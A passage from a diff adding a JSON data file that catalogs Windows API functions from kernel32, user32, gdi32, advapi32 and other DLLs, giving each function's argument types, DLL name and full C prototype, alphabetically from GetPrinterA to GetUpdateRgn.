"DWORD", + "LPDWORD" + ], + "dll_name": "winspool.drv", + "full_prototype": "BOOL GetPrinterA( HANDLE hPrinter, DWORD Level, LPBYTE pPrinter, DWORD cbBuf, LPDWORD pcbNeeded );" + }, + { + "function_name": "GetPriorityClass", + "arguments": [ + "HANDLE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetPriorityClass( HANDLE hProcess );" + }, + { + "function_name": "GetPriorityClipboardFormat", + "arguments": [ + "UINT *", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "int GetPriorityClipboardFormat(UINT * paFormatPriorityList, int cFormats);" + }, + { + "function_name": "GetPrivateObjectSecurity", + "arguments": [ + "PSECURITY_DESCRIPTOR", + "SECURITY_INFORMATION", + "PSECURITY_DESCRIPTOR", + "DWORD", + "PDWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL GetPrivateObjectSecurity( PSECURITY_DESCRIPTOR ObjectDescriptor, SECURITY_INFORMATION SecurityInformation, PSECURITY_DESCRIPTOR ResultantDescriptor, DWORD DescriptorLength, PDWORD ReturnLength );" + }, + { + "function_name": "GetPrivateProfileIntA", + "arguments": [ + "LPCTSTR", + "LPCTSTR", + "INT", + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "UINT GetPrivateProfileIntA( LPCTSTR lpAppName, LPCTSTR lpKeyName, INT nDefault, LPCTSTR lpFileName );" + }, + { + "function_name": "GetPrivateProfileIntW", + "arguments": [ + "LPCWSTR", + "LPCWSTR", + "INT", + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "UINT GetPrivateProfileIntW(LPCWSTR lpAppName,LPCWSTR lpKeyName,INT nDefault,LPCWSTR lpFileName );" + }, + { + "function_name": "GetPrivateProfileSectionA", + "arguments": [ + "LPCTSTR", + "LPTSTR", + "DWORD", + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetPrivateProfileSectionA( LPCTSTR lpAppName, LPTSTR lpReturnedString, DWORD nSize, LPCTSTR lpFileName );" + }, + { + "function_name": "GetPrivateProfileSectionW", + "arguments": [ + "LPCWSTR", + "LPWSTR", + "DWORD", + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetPrivateProfileSectionW(LPCWSTR lpAppName,LPWSTR lpReturnedString,DWORD nSize,LPCWSTR lpFileName );" + }, + { + "function_name": "GetPrivateProfileSectionNamesA", + "arguments": [ + "LPTSTR", + "DWORD", + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetPrivateProfileSectionNamesA( LPTSTR lpszReturnBuffer, DWORD nSize, LPCTSTR lpFileName );" + }, + { + "function_name": "GetPrivateProfileSectionNamesW", + "arguments": [ + "LPWSTR", + "DWORD", + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetPrivateProfileSectionNamesW(LPWSTR lpszReturnBuffer,DWORD nSize,LPCWSTR lpFileName);" + }, + { + "function_name": "GetPrivateProfileStringA", + "arguments": [ + "LPCTSTR", + "LPCTSTR", + "LPCTSTR", + "LPTSTR", + "DWORD", + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetPrivateProfileStringA( LPCTSTR lpAppName, LPCTSTR lpKeyName, LPCTSTR lpDefault, LPTSTR lpReturnedString, DWORD nSize, LPCTSTR lpFileName );" + }, + { + "function_name": "GetPrivateProfileStringW", + "arguments": [ + "LPCWSTR", + "LPCWSTR", + "LPCWSTR", + "LPWSTR", + "DWORD", + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetPrivateProfileStringW(LPCWSTR lpAppName,LPCWSTR lpKeyName,LPCWSTR lpDefault,LPWSTR lpReturnedString,DWORD nSize,LPCWSTR lpFileName );" + }, + { + "function_name": "GetProcAddress", + "arguments": [ + "HMODULE", + "LPCSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "FARPROC GetProcAddress( HMODULE hModule, LPCSTR lpProcName );" + }, + { + "function_name": "GetProcessAffinityMask", + "arguments": [ + "HANDLE", + "LPDWORD", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetProcessAffinityMask( HANDLE hProcess, LPDWORD lpProcessAffinityMask, LPDWORD lpSystemAffinityMask );" + }, + { + "function_name": "GetProcessHeap", + "arguments": [ + "" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE GetProcessHeap(VOID);" + }, + { + "function_name": "GetProcessHeaps", + "arguments": [ + "DWORD", + "PHANDLE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetProcessHeaps( DWORD NumberOfHeaps, PHANDLE ProcessHeaps );" + }, + { + "function_name": "GetProcessPriorityBoost", + "arguments": [ + "HANDLE", + "PBOOL" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetProcessPriorityBoost(HANDLE hProcess,PBOOL pDisablePriorityBoost);" + }, + { + "function_name": "GetProcessShutdownParameters", + "arguments": [ + "LPDWORD", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetProcessShutdownParameters( LPDWORD lpdwLevel, LPDWORD lpdwFlags );" + }, + { + "function_name": "GetProcessTimes", + "arguments": [ + "HANDLE", + "LPFILETIME", + "LPFILETIME", + "LPFILETIME", + "LPFILETIME" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetProcessTimes( HANDLE hProcess, LPFILETIME lpCreationTime, LPFILETIME lpExitTime, LPFILETIME lpKernelTime, LPFILETIME lpUserTime );" + }, + { + "function_name": "GetProcessVersion", + "arguments": [ + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetProcessVersion( DWORD ProcessId );" + }, + { + "function_name": "GetProcessWindowStation", + "arguments": [ + "" + ], + "dll_name": "user32.dll", + "full_prototype": "HWINSTA GetProcessWindowStation(VOID);" + }, + { + "function_name": "GetProcessWorkingSetSize", + "arguments": [ + "HANDLE", + "LPDWORD", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetProcessWorkingSetSize( HANDLE hProcess, LPDWORD lpMinimumWorkingSetSize, LPDWORD lpMaximumWorkingSetSize );" + }, + { + "function_name": "GetProfileIntA", + "arguments": [ + "LPCTSTR", + "LPCTSTR", + "INT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "UINT GetProfileIntA( LPCTSTR lpAppName, LPCTSTR lpKeyName, INT nDefault );" + }, + { + "function_name": "GetProfileIntW", + "arguments": [ + "LPCWSTR", + "LPCWSTR", + "INT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "UINT GetProfileIntW(LPCWSTR lpAppName,LPCWSTR lpKeyName,INT nDefault );" + }, + { + "function_name": "GetProfileSectionA", + "arguments": [ + "LPCTSTR", + "LPTSTR", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetProfileSectionA( LPCTSTR lpAppName, LPTSTR lpReturnedString, DWORD nSize );" + }, + { + "function_name": "GetProfileSectionW", + "arguments": [ + "LPCWSTR", + "LPWSTR", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetProfileSectionW(LPCWSTR lpAppName,LPWSTR lpReturnedString,DWORD nSize );" + }, + { + "function_name": "GetProfileStringA", + "arguments": [ + "LPCTSTR", + "LPCTSTR", + "LPCTSTR", + "LPTSTR", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetProfileStringA( LPCTSTR lpAppName, LPCTSTR lpKeyName, LPCTSTR lpDefault, LPTSTR lpReturnedString, DWORD nSize );" + }, + { + "function_name": "GetProfileStringW", + "arguments": [ + "LPCWSTR", + "LPCWSTR", + "LPCWSTR", + "LPWSTR", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetProfileStringW(LPCWSTR lpAppName,LPCWSTR lpKeyName,LPCWSTR lpDefault,LPWSTR lpReturnedString,DWORD nSize );" + }, + { + "function_name": "GetPropA", + "arguments": [ + "HWND", + "LPCTSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "HANDLE GetPropA(HWND hWnd, LPCTSTR lpString);" + }, + { + "function_name": "GetPropW", + "arguments": [ + "HWND", + "LPCWSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "HANDLE GetPropW(HWND hWnd, LPCWSTR lpString);" + }, + { + "function_name": "GetQueuedCompletionStatus", + "arguments": [ + "HANDLE", + "LPDWORD", + "LPDWORD", + "LPOVERLAPPED *", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetQueuedCompletionStatus( HANDLE CompletionPort, LPDWORD lpNumberOfBytesTransferred, LPDWORD lpCompletionKey, LPOVERLAPPED * lpOverlapped, DWORD dwMilliseconds );" + }, + { + "function_name": "GetQueueStatus", + "arguments": [ + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "DWORD GetQueueStatus(UINT flags);" + }, + { + "function_name": "GetRasterizerCaps", + "arguments": [ + "LPRASTERIZER_STATUS", + "UINT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL GetRasterizerCaps(LPRASTERIZER_STATUS lprs, UINT cb);" + }, + { + "function_name": "GetRegionData", + "arguments": [ + "HRGN", + "DWORD", + "LPRGNDATA" + ], + "dll_name": "gdi32.dll", + "full_prototype": "DWORD GetRegionData(HRGN hRgn,DWORD dwCount, LPRGNDATA lpRgnData);" + }, + { + "function_name": "GetRgnBox", + "arguments": [ + "HRGN", + "LPRECT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int GetRgnBox(HRGN hrgn, LPRECT lprc);" + }, + { + "function_name": "GetROP2", + "arguments": [ + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int GetROP2(HDC hdc);" + }, + { + "function_name": "GetScrollInfo", + "arguments": [ + "HWND", + "int", + "LPSCROLLINFO" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL GetScrollInfo(HWND hwnd,int fnBar, LPSCROLLINFO lpsi);" + }, + { + "function_name": "GetScrollPos", + "arguments": [ + "HWND", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "int GetScrollPos(HWND hWnd, int nBar);" + }, + { + "function_name": "GetScrollRange", + "arguments": [ + "HWND", + "int", + "LPINT", + "LPINT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL GetScrollRange(HWND hWnd, int nBar, LPINT lpMinPos, LPINT lpMaxPos);" + }, + { + "function_name": "GetSecurityDescriptorControl", + "arguments": [ + "PSECURITY_DESCRIPTOR", + "PSECURITY_DESCRIPTOR_CONTROL", + "LPDWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL GetSecurityDescriptorControl( PSECURITY_DESCRIPTOR pSecurityDescriptor, PSECURITY_DESCRIPTOR_CONTROL pControl, LPDWORD lpdwRevision );" + }, + { + "function_name": "GetSecurityDescriptorDacl", + "arguments": [ + "PSECURITY_DESCRIPTOR", + "LPBOOL", + "PACL", + "LPBOOL" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL GetSecurityDescriptorDacl( PSECURITY_DESCRIPTOR pSecurityDescriptor, LPBOOL lpbDaclPresent, PACL *pDacl, LPBOOL lpbDaclDefaulted );" + }, + { + "function_name": "GetSecurityDescriptorGroup", + "arguments": [ + "PSECURITY_DESCRIPTOR", + "PSID *", + "LPBOOL" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL GetSecurityDescriptorGroup( PSECURITY_DESCRIPTOR pSecurityDescriptor, PSID * pGroup, LPBOOL lpbGroupDefaulted );" + }, + { + "function_name": "GetSecurityDescriptorLength", + "arguments": [ + "PSECURITY_DESCRIPTOR" + ], + "dll_name": "advapi32.dll", + "full_prototype": "DWORD GetSecurityDescriptorLength( PSECURITY_DESCRIPTOR pSecurityDescriptor );" + }, + { + "function_name": "GetSecurityDescriptorOwner", + "arguments": [ + "PSECURITY_DESCRIPTOR", + "PSID *", + "LPBOOL" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL GetSecurityDescriptorOwner( PSECURITY_DESCRIPTOR pSecurityDescriptor, PSID * pOwner, LPBOOL lpbOwnerDefaulted );" + }, + { + "function_name": "GetSecurityDescriptorSacl", + "arguments": [ + "PSECURITY_DESCRIPTOR", + "LPBOOL", + "PACL", + "LPBOOL" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL GetSecurityDescriptorSacl( PSECURITY_DESCRIPTOR pSecurityDescriptor, LPBOOL lpbSaclPresent, PACL *pSacl, LPBOOL lpbSaclDefaulted );" + }, + { + "function_name": "GetShortPathNameA", + "arguments": [ + "LPCTSTR", + "LPTSTR", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetShortPathNameA( LPCTSTR lpszLongPath, LPTSTR lpszShortPath, DWORD cchBuffer );" + }, + { + "function_name": "GetShortPathNameW", + "arguments": [ + "LPCWSTR", + "LPWSTR", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetShortPathNameW(LPCWSTR lpszLongPath,LPWSTR lpszShortPath,DWORD cchBuffer );" + }, + { + "function_name": "GetSidIdentifierAuthority", + "arguments": [ + "PSID" + ], + "dll_name": "advapi32.dll", + "full_prototype": "PSID_IDENTIFIER_AUTHORITY GetSidIdentifierAuthority( PSID pSid );" + }, + { + "function_name": "GetSidLengthRequired", + "arguments": [ + "UCHAR" + ], + "dll_name": "advapi32.dll", + "full_prototype": "DWORD GetSidLengthRequired( UCHAR nSubAuthorityCount );" + }, + { + "function_name": "GetSidSubAuthority", + "arguments": [ + "PSID", + "DWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "PDWORD GetSidSubAuthority( PSID pSid, DWORD nSubAuthority );" + }, + { + "function_name": "GetSidSubAuthorityCount", + "arguments": [ + "PSID" + ], + "dll_name": "advapi32.dll", + "full_prototype": "PUCHAR GetSidSubAuthorityCount( PSID pSid );" + }, + { + "function_name": "GetStartupInfoA", + "arguments": [ + "LPSTARTUPINFO" + ], + "dll_name": "kernel32.dll", + "full_prototype": "VOID GetStartupInfoA( LPSTARTUPINFO lpStartupInfo );" + }, + { + "function_name": "GetStartupInfoW", + "arguments": [ + "LPSTARTUPINFOW" + ], + "dll_name": "kernel32.dll", + "full_prototype": "VOID GetStartupInfoW(LPSTARTUPINFOW lpStartupInfo );" + }, + { + "function_name": "GetStdHandle", + "arguments": [ + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE GetStdHandle(DWORD nStdHandle);" + }, + { + "function_name": "GetStockObject", + "arguments": [ + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HGDIOBJ GetStockObject(int fnObject);" + }, + { + "function_name": "GetStretchBltMode", + "arguments": [ + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int GetStretchBltMode(HDC hdc);" + }, + { + "function_name": "GetStringTypeA", + "arguments": [ + "LCID", + "DWORD", + "LPCSTR", + "int", + "LPWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetStringTypeA( LCID Locale, DWORD dwInfoType, LPCSTR lpSrcStr, int cchSrc, LPWORD lpCharType );" + }, + { + "function_name": "GetStringTypeExA", + "arguments": [ + "LCID", + "DWORD", + "LPCTSTR", + "int", + "LPWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetStringTypeExA( LCID Locale, DWORD dwInfoType, LPCTSTR lpSrcStr, int cchSrc, LPWORD lpCharType );" + }, + { + "function_name": "GetStringTypeExW", + "arguments": [ + "LCID", + "DWORD", + "LPCWSTR", + "INT", + "LPWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetStringTypeExW( LCID locale, DWORD type, LPCWSTR src, INT count, LPWORD chartype );" + }, + { + "function_name": "GetStringTypeW", + "arguments": [ + "DWORD", + "LPCWSTR", + "INT", + "LPWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetStringTypeW( DWORD type, LPCWSTR src, INT count, LPWORD chartype );" + }, + { + "function_name": "GetSubMenu", + "arguments": [ + "HMENU", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "HMENU GetSubMenu(HMENU hMenu, int nPos);" + }, + { + "function_name": "GetSysColor", + "arguments": [ + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "DWORD GetSysColor(int nIndex);" + }, + { + "function_name": "GetSysColorBrush", + "arguments": [ + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "HBRUSH GetSysColorBrush(int nIndex);" + }, + { + "function_name": "GetSystemDefaultLCID", + "arguments": [ + "" + ], + "dll_name": "kernel32.dll", + "full_prototype": "LCID GetSystemDefaultLCID(VOID);" + }, + { + "function_name": "GetSystemDefaultLangID", + "arguments": [ + "" + ], + "dll_name": "kernel32.dll", + "full_prototype": "LANGID GetSystemDefaultLangID(VOID);" + }, + { + "function_name": "GetSystemDirectoryA", + "arguments": [ + "LPTSTR", + "UINT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "UINT GetSystemDirectoryA(LPTSTR lpBuffer,UINT uSize);" + }, + { + "function_name": "GetSystemDirectoryW", + "arguments": [ + "LPWSTR", + "UINT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "UINT GetSystemDirectoryW(LPWSTR lpBuffer, UINT uSize);" + }, + { + "function_name": "GetSystemInfo", + "arguments": [ + "LPSYSTEM_INFO" + ], + "dll_name": "kernel32.dll", + "full_prototype": "VOID GetSystemInfo(LPSYSTEM_INFO lpSystemInfo);" + }, + { + "function_name": "GetSystemMenu", + "arguments": [ + "HWND", + "BOOL" + ], + "dll_name": "user32.dll", + "full_prototype": "HMENU GetSystemMenu(HWND hWnd,BOOL bRevert);" + }, + { + "function_name": "GetSystemMetrics", + "arguments": [ + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "int GetSystemMetrics(int nIndex);" + }, + { + "function_name": "GetSystemPaletteEntries", + "arguments": [ + "HDC", + "UINT", + "UINT", + "LPPALETTEENTRY" + ], + "dll_name": "gdi32.dll", + "full_prototype": "UINT GetSystemPaletteEntries(HDC hdc, UINT iStartIndex, UINT nEntries, LPPALETTEENTRY lppe);" + }, + { + "function_name": "GetSystemPaletteUse", + "arguments": [ + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "UINT GetSystemPaletteUse(HDC hdc);" + }, + { + "function_name": "GetSystemPowerStatus", + "arguments": [ + "LPSYSTEM_POWER_STATUS" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetSystemPowerStatus(LPSYSTEM_POWER_STATUS lpSystemPowerStatus);" + }, + { + "function_name": "GetSystemTime", + "arguments": [ + "LPSYSTEMTIME" + ], + "dll_name": "kernel32.dll", + "full_prototype": "VOID GetSystemTime(LPSYSTEMTIME lpSystemTime);" + }, + { + "function_name": "GetSystemTimeAsFileTime", + "arguments": [ + "LPFILETIME" + ], + "dll_name": "kernel32.dll", + "full_prototype": "VOID GetSystemTimeAsFileTime(LPFILETIME lpSystemTimeAsFileTime);" + }, + { + "function_name": "GetSystemTimeAdjustment", + "arguments": [ + "PDWORD", + "PDWORD", + "PBOOL" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetSystemTimeAdjustment( PDWORD lpTimeAdjustment, PDWORD lpTimeIncrement, PBOOL lpTimeAdjustmentDisabled );" + }, + { + "function_name": "GetTabbedTextExtentA", + "arguments": [ + "HDC", + "LPCTSTR", + "int", + "int", + "LPINT" + ], + "dll_name": "user32.dll", + "full_prototype": "DWORD GetTabbedTextExtentA(HDC hDC, LPCTSTR lpString, int nCount, int nTabPositions, LPINT lpnTabStopPositions);" + }, + { + "function_name": "GetTabbedTextExtentW", + "arguments": [ + "HDC", + "LPCWSTR", + "int", + "int", + "LPINT" + ], + "dll_name": "user32.dll", + "full_prototype": "DWORD GetTabbedTextExtentW(HDC hDC, LPCWSTR lpString, int nCount, int nTabPositions, LPINT lpnTabStopPositions);" + }, + { + "function_name": "GetTapeParameters", + "arguments": [ + "HANDLE", + "DWORD", + "LPDWORD", + "LPVOID" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetTapeParameters( HANDLE hDevice, DWORD dwOperation, LPDWORD lpdwSize, LPVOID lpTapeInformation );" + }, + { + "function_name": "GetTapePosition", + "arguments": [ + "HANDLE", + "DWORD", + "LPDWORD", + "LPDWORD", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetTapePosition( HANDLE hDevice, DWORD dwPositionType, LPDWORD lpdwPartition, LPDWORD lpdwOffsetLow, LPDWORD lpdwOffsetHigh );" + }, + { + "function_name": "GetTapeStatus", + "arguments": [ + "HANDLE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetTapeStatus(HANDLE hDevice);" + }, + { + "function_name": "GetTcpStatistics", + "arguments": [ + "PMIB_TCPSTATS" + ], + "dll_name": "iphlpapi.dll", + "full_prototype": "DWORD GetTcpStatistics(PMIB_TCPSTATS pStats);" + }, + { + "function_name": "GetTempFileNameA", + "arguments": [ + "LPCTSTR", + "LPCTSTR", + "UINT", + "LPTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "UINT GetTempFileNameA(LPCTSTR lpPathName, LPCTSTR lpPrefixString, UINT uUnique, LPTSTR lpTempFileName);" + }, + { + "function_name": "GetTempFileNameW", + "arguments": [ + "LPCWSTR", + "LPCWSTR", + "UINT", + "LPWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "UINT GetTempFileNameW( LPCWSTR lpPathName, LPCWSTR lpPrefixString, UINT unique, LPWSTR lpTempFileName );" + }, + { + "function_name": "GetTempPathA", + "arguments": [ + "DWORD", + "LPTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetTempPathA(DWORD nBufferLength,LPTSTR lpBuffer);" + }, + { + "function_name": "GetTempPathW", + "arguments": [ + "DWORD", + "LPWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetTempPathW(DWORD nBufferLength,LPWSTR lpBuffer);" + }, + { + "function_name": "GetTextAlign", + "arguments": [ + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "UINT GetTextAlign(HDC hdc);" + }, + { + "function_name": "GetTextCharacterExtra", + "arguments": [ + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int GetTextCharacterExtra(HDC hdc);" + }, + { + "function_name": "GetTextCharset", + "arguments": [ + "HDC", + "LPFONTSIGNATURE *", + "DWORD" + ], + "dll_name": "gdi32.dll", + "full_prototype": "UINT GetTextCharsetInfo(HDC hdc, LPFONTSIGNATURE * lpSig, DWORD dwFlags);" + }, + { + "function_name": "GetTextCharsetInfo", + "arguments": [ + "HDC", + "LPFONTSIGNATURE *", + "DWORD" + ], + "dll_name": "gdi32.dll", + "full_prototype": "UINT GetTextCharsetInfo(HDC hdc, LPFONTSIGNATURE * lpSig, DWORD dwFlags);" + }, + { + "function_name": "GetTextColor", + "arguments": [ + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "COLORREF GetTextColor(HDC hdc);" + }, + { + "function_name": "GetTextExtentExPointA", + "arguments": [ + "HDC", + "LPCTSTR", + "int", + "int", + "LPINT", + "LPINT", + "LPSIZE" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL GetTextExtentExPointA(HDC hdc, LPCTSTR lpszStr, int cchString, int nMaxExtent, LPINT lpnFit, LPINT alpDx,LPSIZE lpSize);" + }, + { + "function_name": "GetTextExtentExPointW", + "arguments": [ + "HDC", + "LPCWSTR", + "int", + "int", + "LPINT", + "LPINT", + "LPSIZE" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL GetTextExtentExPointW(HDC hdc, LPCWSTR lpszStr, int cchString, int nMaxExtent, LPINT lpnFit, LPINT alpDx,LPSIZE lpSize);" + }, + { + "function_name": "GetTextExtentPoint32A", + "arguments": [ + "HDC", + "LPCTSTR", + "int", + "LPSIZE" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL GetTextExtentPoint32A(HDC hdc, LPCTSTR lpString, int cbString, LPSIZE lpSize);" + }, + { + "function_name": "GetTextExtentPoint32W", + "arguments": [ + "HDC", + "LPCWSTR", + "INT", + "LPSIZE" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL GetTextExtentPoint32W(HDC hdc, LPCWSTR str, INT count, LPSIZE size);" + }, + { + "function_name": "GetTextExtentPointA", + "arguments": [ + "HDC", + "LPCTSTR", + "int", + "LPSIZE" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL GetTextExtentPointA(HDC hdc, LPCTSTR lpString, int cbString, LPSIZE lpSize);" + }, + { + "function_name": "GetTextExtentPointW", + "arguments": [ + "HDC", + "LPCWSTR", + "int", + "LPSIZE" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL GetTextExtentPointW(HDC hdc, LPCWSTR lpString, int cbString, LPSIZE lpSize);" + }, + { + "function_name": "GetTextFaceA", + "arguments": [ + "HDC", + "int", + "LPTSTR" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int GetTextFaceA(HDC hdc, int nCount, LPTSTR lpFaceName);" + }, + { + "function_name": "GetTextFaceW", + "arguments": [ + "HDC", + "int", + "LPWSTR" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int GetTextFaceW(HDC hdc, int nCount, LPWSTR lpFaceName);" + }, + { + "function_name": "GetTextMetricsA", + "arguments": [ + "HDC", + "LPTEXTMETRIC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL GetTextMetricsA(HDC hdc, LPTEXTMETRIC lptm);" + }, + { + "function_name": "GetTextMetricsW", + "arguments": [ + "HDC", + "LPTEXTMETRICW" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL GetTextMetricsW(HDC hdc, LPTEXTMETRICW lptm);" + }, + { + "function_name": "GetThreadContext", + "arguments": [ + "HANDLE", + "LPCONTEXT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetThreadContext( HANDLE hThread, LPCONTEXT lpContext );" + }, + { + "function_name": "GetThreadDesktop", + "arguments": [ + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "HDESK GetThreadDesktop(DWORD dwThreadId);" + }, + { + "function_name": "GetThreadLocale", + "arguments": [ + "" + ], + "dll_name": "kernel32.dll", + "full_prototype": "LCID GetThreadLocale(VOID);" + }, + { + "function_name": "GetThreadPriority", + "arguments": [ + "HANDLE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "int GetThreadPriority(HANDLE hThread);" + }, + { + "function_name": "GetThreadPriorityBoost", + "arguments": [ + "HANDLE", + "PBOOL" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetThreadPriorityBoost(HANDLE hthread, PBOOL pstate);" + }, + { + "function_name": "GetThreadSelectorEntry", + "arguments": [ + "HANDLE", + "DWORD", + "LPLDT_ENTRY" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetThreadSelectorEntry( HANDLE hThread, DWORD dwSelector, LPLDT_ENTRY lpSelectorEntry );" + }, + { + "function_name": "GetThreadTimes", + "arguments": [ + "HANDLE", + "LPFILETIME", + "LPFILETIME", + "LPFILETIME", + "LPFILETIME" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetThreadTimes( HANDLE hThread, LPFILETIME lpCreationTime, LPFILETIME lpExitTime, LPFILETIME lpKernelTime, LPFILETIME lpUserTime );" + }, + { + "function_name": "GetTickCount", + "arguments": [ + "" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetTickCount(VOID);" + }, + { + "function_name": "GetTimeFormatA", + "arguments": [ + "LCID", + "DWORD", + "CONST SYSTEMTIME *", + "LPCTSTR", + "LPTSTR", + "int" + ], + "dll_name": "kernel32.dll", + "full_prototype": "int GetTimeFormatA( LCID Locale, DWORD dwFlags, CONST SYSTEMTIME * lpTime, LPCTSTR lpFormat, LPTSTR lpTimeStr, int cchTime );" + }, + { + "function_name": "GetTimeFormatW", + "arguments": [ + "LCID", + "DWORD", + "const SYSTEMTIME*", + "LPCWSTR", + "LPWSTR", + "int" + ], + "dll_name": "kernel32.dll", + "full_prototype": "int GetTimeFormatW( LCID lcid, DWORD dwFlags, const SYSTEMTIME* lpTime, LPCWSTR lpFormat, LPWSTR lpTimeStr, int cchOut );" + }, + { + "function_name": "GetTimeZoneInformation", + "arguments": [ + "LPTIME_ZONE_INFORMATION" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetTimeZoneInformation(LPTIME_ZONE_INFORMATION lpTimeZoneInformation);" + }, + { + "function_name": "GetTokenInformation", + "arguments": [ + "HANDLE", + "TOKEN_INFORMATION_CLASS", + "LPVOID", + "DWORD", + "PDWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL GetTokenInformation( HANDLE TokenHandle, TOKEN_INFORMATION_CLASS TokenInformationClass, LPVOID TokenInformation, DWORD TokenInformationLength, PDWORD ReturnLength );" + }, + { + "function_name": "GetTopWindow", + "arguments": [ + "HWND" + ], + "dll_name": "user32.dll", + "full_prototype": "HWND GetTopWindow(HWND hWnd);" + }, + { + "function_name": "GetUdpStatistics", + "arguments": [ + "PMIB_UDPSTATS" + ], + "dll_name": "iphlpapi.dll", + "full_prototype": "DWORD GetUdpStatistics(PMIB_UDPSTATS pStats);" + }, + { + "function_name": "GetUpdateRect", + "arguments": [ + "HWND", + "LPRECT", + "BOOL" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL GetUpdateRect(HWND hWnd, LPRECT lpRect, BOOL bErase);" + }, + { + "function_name": "GetUpdateRgn", + "arguments": [ + "HWND", + "HRGN", + "BOOL" + ], + "dll_name": "user32.dll", + "full_prototype": "int GetUpdateRgn(HWND hWnd, HRGN hRgn, 